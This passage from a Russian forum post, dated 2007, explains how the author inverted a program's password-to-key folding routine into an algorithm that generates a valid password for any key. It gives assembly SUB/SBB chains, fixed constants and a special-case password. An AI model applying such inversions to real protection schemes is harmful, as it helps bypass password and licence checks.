/>кольцевым, если ловушка расположена между 31-ым и 0-ым&#160; битами&#160; (там&#160; где<br />двойное слово склеивается в кольцо), а биты символа никак не сдвинуты :<br />0000 0000 0000 0000 0000 0000 0999 9999</p> <p>Но, попадание переносов в ловушки можно рассматривать, как особый случай.<br />В&#160; &#160;итоге&#160; &#160;можно&#160; &#160;свести&#160; весь&#160; алгоритм&#160; формирования&#160; ключа&#160; к&#160; ОДНОЙ<br />ЕДИНСТВЕННОЙ ОПЕРАЦИИ КОЛЬЦЕВОГО СЛОЖЕНИЯ ПРЕДВАРИТЕЛЬНО СДВИНУТЫХ&#160; БИТОВ<br />СИМВОЛОВ ПАРОЛЯ с особым случаем, когда за счет гибели переноса результат<br />кольцевого&#160; сложения&#160; нужно&#160; будет слегка подправить. Обратным КОЛЬЦЕВОМУ<br />СЛОЖЕНИЮ (ADD + ADC ноль) будет, разумеется, являться&#160; столь-же&#160; безумное<br />КОЛЬЦЕВОЕ&#160; &#160;ВЫЧИТАНИЕ&#160; (SUB&#160; +&#160; SBB ноль).&#160; &#160;Таким&#160; образом,&#160; у&#160; операции<br />сворачивания&#160; пароля&#160; в&#160; ключ&#160; нашлась&#160; ОБРАТНАЯ,&#160; хотя&#160; и&#160; осязаемая,&#160; в<br />основном,&#160; на&#160; подсознательном&#160; уровне&#160; !&#160; Особый&#160; случай,&#160; который,&#160; как<br />оказалось&#160; соответствует&#160; &#160;некоторому&#160; &#160;диапазону&#160; &#160;ключей,&#160; &#160;учитывается<br />небольшой коррекцией процесса такого вычитания.</p> <p>Родившийся&#160; в&#160; результате&#160; обратный алгоритм правильнее отнести к области<br />творчества душевнобольных. :) Я его сам до конца не понимаю, но,&#160; тем&#160; не<br />менее,&#160; считает&#160; он правильно. Во всяком случае, когда я его записывал, я<br />как-то&#160; доказал&#160; его&#160; правильность.&#160; Только&#160; сейчас&#160; совершенно&#160; не&#160; могу<br />вспомнить&#160; как.&#160; :(&#160; Поэтому&#160; прежде,&#160; чем&#160; выставлять&#160; его&#160; на&#160; всеобщее<br />обозрение, тупо проверил все варианты ключей от 0000:0000 до FFFF:FFFF за<br />сутки счета на 486DX-66. Все, до&#160; единого,&#160; сгенерированные&#160; пароли&#160; были<br />правильны ! Как удивительно ... :)</p> <p>Логика (здесь это слово звучит кощунственно) алгоритма<br />1.) Вращать ключ 14 раз вправо (или 18 раз влево - без разницы).<br />2.) Если ключ - 0000:0054, то пароль &quot;GGGOKCCCX&quot; {пароль-исключение}.<br />&#160; &#160; Стоп.<br />3.) Если ключ в диапазоне 0000:0000 - 0000:0053, то RIP-перенос = 1,<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;в противном случае RIP-перенос = 0.<br />4.) Кольцевым вычитанием вычесть из ключа (DX:AX) фиксированные биты<br />&#160; &#160; пароля :<br />&#160; &#160; &#160; &#160; SUB&#160; &#160; &#160;AX,0010101000000000B<br />&#160; &#160; &#160; &#160; SBB&#160; &#160; &#160;DX,0100101010010101B<br />&#160; &#160; &#160; &#160; SBB&#160; &#160; &#160;AX,(0000000001010100B минус RIP-перенос)<br />&#160; &#160; &#160; &#160; SBB&#160; &#160; &#160;DX,0&#160; &#160; ;ну разве не прелесть, как заем пробегает по<br />&#160; &#160; &#160; &#160; SBB&#160; &#160; &#160;AX,0&#160; &#160; ;кольцу при таком фантастическом вычитании ? :)<br />&#160; &#160; Мы получили варьируемые биты пароля.<br />5.) Имплантировать&#160; полученные&#160; варьируемые&#160; биты пароля в заготовки&#160; для<br />&#160; &#160; символов и напечатать полученный пароль.</p> <p>В алгоритме осталось обьяснить&#160; один&#160; штрих.&#160; Вместо&#160; того,&#160; чтобы&#160; прямо<br />печатать&#160; на&#160; экране&#160; пароль-исключение&#160; &quot;GGGOKCCCX&quot;,&#160; одна&#160; из костант в<br />алгоритме портится так, чтобы именно этот пароль&#160; и&#160; получался.&#160; Так&#160; что<br />никакого&#160; особого&#160; смысла&#160; в&#160; команде INC Masks[8] нет. Она случайно дает<br />именно такой результат, какой нужен. Но алгоритму это добавило&#160; некоторой<br />доли изящества.</p> <p>Тем,&#160; кто&#160; не знает ассемблера, я приношу свои извинения. Как же все таки<br />записать на языке высокого уровня цепочку</p> <p>SUB AX,Const_1&#160; SBB DX,Const_2&#160; SBB AX,Const_3&#160; SBB DX,0&#160; SBB AX,0</p> <p>(&#160; или вариант - SUB EAX,Const_1_&#160; SBB EAX,Const_2_&#160; SBB EAX,0&#160; )</p> <p>без&#160; извращений,&#160; затеняющих&#160; еe&#160; трансфинитную&#160; :)&#160; суть,&#160; я&#160; так&#160; и&#160; не<br />додумался. :(</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:45:13 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=19#p19